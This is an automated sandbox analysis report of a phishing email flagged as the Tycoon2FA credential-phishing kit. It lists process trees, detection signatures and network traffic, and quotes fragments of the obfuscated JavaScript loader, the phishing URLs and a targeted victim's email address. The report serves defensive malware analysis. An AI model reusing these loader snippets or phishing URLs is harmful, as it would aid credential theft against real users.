Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
original.eml

Overview

General Information

Sample name:original.eml
Analysis ID:1528039
MD5:2faa494e98f91452fe671513610826b9
SHA1:e7b3e88ef7219532cc24c49d72f151e685495c81
SHA256:5c5c7ace4ddb9ff4764b3050cee302ee0fb5d584010e8b3a033c571679934ae3
Infos:

Detection

Tycoon2FA
Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Tycoon 2FA PaaS
Phishing site detected (based on favicon image match)
Form action URLs do not match main URL
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML page contains string obfuscation
HTML title does not match URL
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Suspicious Office Outbound Connections
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6728 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\original.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 4196 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "FF7B597F-3020-4A6F-8172-218BC05F430F" "A618A75E-1B2B-41BA-B15A-12C1C9B0E6F3" "6728" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 1388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\DAFUMPZW\Metalus Remittance_7420249835_11053465.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 6484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1944,i,3455865811790200313,8750311825173435097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://aka.ms/LearnAboutSenderIdentification MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 8168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1844,i,8970548161277558720,12195311957042810965,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • OUTLOOK.EXE (PID: 3424 cmdline: "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\DAFUMPZW\phish_alert_sp2_2.0.0.0.eml" MD5: 91A5292942864110ED734005B7E005C0)
    • chrome.exe (PID: 4956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\DAFUMPZW\Metalus Remittance_7420249835_11053465 (003).html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 4136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1928,i,4118263844888920036,16677394294465106818,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.0.pages.csvJoeSecurity_Tycoon2FAYara detected Tycoon 2FA PaaSJoe Security
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6728, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.16, DestinationIsIpv6: false, DestinationPort: 57790, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, Initiated: true, ProcessId: 6728, Protocol: tcp, SourceIp: 52.109.20.38, SourceIsIpv6: false, SourcePort: 443
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: 0.0.pages.csv, type: HTML
    Source: https://cyt.sprenumen.ru/wJPIeL/#V#dlaurence.brochu@metalus.qc.caMatcher: Template: microsoft matched with high similarity
    Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44HTTP Parser: Form action: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c13cb6fd407&redirect_uri=https%3A%2F%2Fsupport.microsoft.com%2Fsignin-oidc&response_type=code%20id_token&scope=openid%20profile%20offline_access&response_mode=form_post&nonce=638639013531968207.MzMxYjcwZjAtMGIwZC00OTdkLTg0MjQtMTA3ZjkzZTI1MTk1ZjMxNWJmYTktYTVlNS00ZWU1LWJkMjQtOGIxNDQ3MTEyZDE3&prompt=none&nopa=2&state=CfDJ8LWN6nmb9HBGpcIJvpEgkL3HwMWhC5CDSxc5fplJTzFedzTbmBtfPLgKDrSP3Smbo7snMUHggeNAAbFUCe-oMACqzRpqbYLASuvZLDeaEjpGoV59zseTjwPzpOJbEBwL_I1gDnJ5ay4JzJbjlO9Ru40iq6U874irOcfGDmwiuh5WzmU1kAR7RuxCLILWUfoQJE6g09uA1p_Qwtp1Fn3-qgIels25Th4F9SGPdn0IseMU6Kxz-Kf8eHtvUdJYNnOMFtoVTZl7q6W05WGLJYNQZ44mweK8mzBZM8D6M1E4UnGO3oLfBUzqeP-03kjNJO0bSRBavuKgIozbz0e9hbsd5EmRO6xNa-GtJfZVgeOrLhEk&x-client-SKU=ID_NET6_0&x-client-ver=8.0.2.0&sso_reload=true microsoft microsoftonline
    Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44HTTP Parser: Number of links: 0
    Source: https://cyt.sprenumen.ru/wJPIeL/#I#dlaurence.brochu@metalus.qc.caHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none" viewBox="0 0 26 26"><path fill="#d9d9d9" d="M13 0a13 13 0 1 0 0 26 13 13 0 0 0 0-26m0 24a11 11 0 1 1 0-22 11 11 0 0 1 0 22"/><path fill="#d9d9d9" d="m10.955 16.055-3.95-4.125-1.445...
    Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/DAFUMPZW/Metalus%20Remittance_7420249835_11053465%20(003).htmlHTTP Parser: Found new string: script document[giraffe]( upupa + ficus + '></sc' + 'ript>') ;...
    Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/DAFUMPZW/Metalus%20Remittance_7420249835_11053465.htmlHTTP Parser: Found new string: script document[giraffe]( upupa + ficus + '></sc' + 'ript>') ;...
    Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44HTTP Parser: Title: Redirecting does not match URL
    Source: https://web10.pro/res444.php?2-68747470733a2f2f4359542e737072656e756d656e2e72752f774a5049654c2f-kelpHTTP Parser: var uozrsqgpvndpexxx = document.createelement("script");uozrsqgpvndpexxx.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(uozrsqgpvndpexxx);uozrsqgpvndpexxx.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoiblnxsit3bg1wmuu3b0rceg85ew1qyjq4wmnlufvqd2xlb3lxvehxbklkrurqduron3rnc1jxzzhiz2lynhvimwzhamjutnazwm1hou9jvvzuvxbxoxbeyznxavp0b1qxtxkwnuhvmglmdk9zcem5eknirmnemfwvs29tb1jurnrudhdvk0y0nfzxtm1ublpyrlh6wxywtw1tz2jpwvz1ueu2mw9ndgvyu2tcl05itjh5vjkzd0m5tef4ajlozgiyulzok2rbdgxcl2ezvziwqmzjsfbqvfjgdvrha3vgq2xnzgi4vflowtayse9jwnzuzevdetfea1prnljhbmxrzxiyvff6wkntvxvrzdhxcmdhxc9ubwmrmthkazrobtvcnxllejlkwwddzdzgakjzqitsswzcl3rldmpkdnveumrkvgnnvvvyzk1mnvp1t1huckfqzmg4cjvgzm5iwmorb1z2ehi1ynv6ynfdahfinghfbxqwk3dzcmron2w5wm5ivjrcl0s1ue1uzhpqy2m1ee1mdtlur0d5zwxdafi5vklwrnzxqkvkq1nhnnfuxc8yzedhk3nwudltv0vvdm5lmdltufcrxc9utfzjqwxwt2o4y1f0dvj2eeg2y0lnsum5dzi3xc9vn0fnt28rtuhquhl0mejqmlu2cjbydhhntgdtzlywsvh2xc92mgrhtlrclznsxc9mtuhfcmlvqtkrsgz3xc...
    Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44HTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3
    Source: https://cyt.sprenumen.ru/wJPIeL/#I#dlaurence.brochu@metalus.qc.caHTTP Parser: No favicon
    Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44HTTP Parser: No favicon
    Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44HTTP Parser: No favicon
    Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44HTTP Parser: No favicon
    Source: https://cyt.sprenumen.ru/wJPIeL/#V#dlaurence.brochu@metalus.qc.caHTTP Parser: No favicon
    Source: https://cyt.sprenumen.ru/wJPIeL/#V#dlaurence.brochu@metalus.qc.caHTTP Parser: No favicon
    Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44HTTP Parser: No <meta name="author".. found
    Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44HTTP Parser: No <meta name="author".. found
    Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44HTTP Parser: No <meta name="copyright".. found
    Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44HTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 52.109.20.38:443 -> 192.168.2.16:57790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.160.20:443 -> 192.168.2.16:57796 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.160.20:443 -> 192.168.2.16:57801 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:57803 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:57806 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:57807 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:57989 version: TLS 1.2
    Source: chrome.exeMemory has grown: Private usage: 1MB later: 31MB
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: unknownTCP traffic detected without corresponding DNS query: 52.109.20.38
    Source: global trafficDNS traffic detected: DNS query: web10.pro
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cyt.sprenumen.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: aka.ms
    Source: global trafficDNS traffic detected: DNS query: support.content.office.net
    Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
    Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
    Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
    Source: global trafficDNS traffic detected: DNS query: mem.gfx.ms
    Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
    Source: global trafficDNS traffic detected: DNS query: assets.onestore.ms
    Source: global trafficDNS traffic detected: DNS query: microsoftwindows.112.2o7.net
    Source: global trafficDNS traffic detected: DNS query: logincdn.msftauth.net
    Source: global trafficDNS traffic detected: DNS query: acctcdn.msftauth.net
    Source: global trafficDNS traffic detected: DNS query: xqe94soygyl0xmmn7oi0raibl6rn1ojg7he0qyjbvy1xxkrsv028hloblup.zentriva.su
    Source: global trafficDNS traffic detected: DNS query: noon.com
    Source: global trafficDNS traffic detected: DNS query: www.noon.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 58031 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57806
    Source: unknownNetwork traffic detected: HTTP traffic on port 57819 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57804
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57925
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57803
    Source: unknownNetwork traffic detected: HTTP traffic on port 58039 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57921
    Source: unknownNetwork traffic detected: HTTP traffic on port 58016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58019 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57989 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57914 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57908 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57819
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57818
    Source: unknownNetwork traffic detected: HTTP traffic on port 57843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57934
    Source: unknownNetwork traffic detected: HTTP traffic on port 57925 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57935
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57811
    Source: unknownNetwork traffic detected: HTTP traffic on port 58034 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57946 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58040 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58027 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57828
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57827
    Source: unknownNetwork traffic detected: HTTP traffic on port 57827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57824
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57945
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57823
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57944
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57946
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57820
    Source: unknownNetwork traffic detected: HTTP traffic on port 57903 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58033 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57821
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57796
    Source: unknownNetwork traffic detected: HTTP traffic on port 58020 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57790
    Source: unknownNetwork traffic detected: HTTP traffic on port 57945 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57912 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58028 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57838
    Source: unknownNetwork traffic detected: HTTP traffic on port 57824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57835
    Source: unknownNetwork traffic detected: HTTP traffic on port 58036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57837
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57958
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57836
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57831
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58007
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57830
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57833
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57799
    Source: unknownNetwork traffic detected: HTTP traffic on port 57835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57840
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58016
    Source: unknownNetwork traffic detected: HTTP traffic on port 57917 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58025 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58029 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57821 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57844 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57846
    Source: unknownNetwork traffic detected: HTTP traffic on port 57829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57845
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57847
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58018
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57841
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58017
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58019
    Source: unknownNetwork traffic detected: HTTP traffic on port 58035 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58025
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58024
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58027
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58026
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58021
    Source: unknownNetwork traffic detected: HTTP traffic on port 57838 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58020
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58023
    Source: unknownNetwork traffic detected: HTTP traffic on port 57841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57876 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58026 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58030 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57830 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58029
    Source: unknownNetwork traffic detected: HTTP traffic on port 57921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58028
    Source: unknownNetwork traffic detected: HTTP traffic on port 58038 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57860
    Source: unknownNetwork traffic detected: HTTP traffic on port 58017 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58036
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58035
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58038
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58037
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58032
    Source: unknownNetwork traffic detected: HTTP traffic on port 57806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58031
    Source: unknownNetwork traffic detected: HTTP traffic on port 57833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58034
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58033
    Source: unknownNetwork traffic detected: HTTP traffic on port 58023 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58030
    Source: unknownNetwork traffic detected: HTTP traffic on port 57915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57908
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57989
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57903
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58039
    Source: unknownNetwork traffic detected: HTTP traffic on port 58037 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57916 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58043
    Source: unknownNetwork traffic detected: HTTP traffic on port 57862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57935 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58040
    Source: unknownNetwork traffic detected: HTTP traffic on port 58007 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58043 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57820 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57916
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57915
    Source: unknownNetwork traffic detected: HTTP traffic on port 57845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57917
    Source: unknownNetwork traffic detected: HTTP traffic on port 57958 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57828 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57912
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57914
    Source: unknownNetwork traffic detected: HTTP traffic on port 57796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58032 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57910
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57876
    Source: unknownNetwork traffic detected: HTTP traffic on port 58018 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57881
    Source: unknownNetwork traffic detected: HTTP traffic on port 57944 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57831 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 57839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 58021 -> 443
    Source: unknownHTTPS traffic detected: 52.109.20.38:443 -> 192.168.2.16:57790 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.190.160.20:443 -> 192.168.2.16:57796 version: TLS 1.2
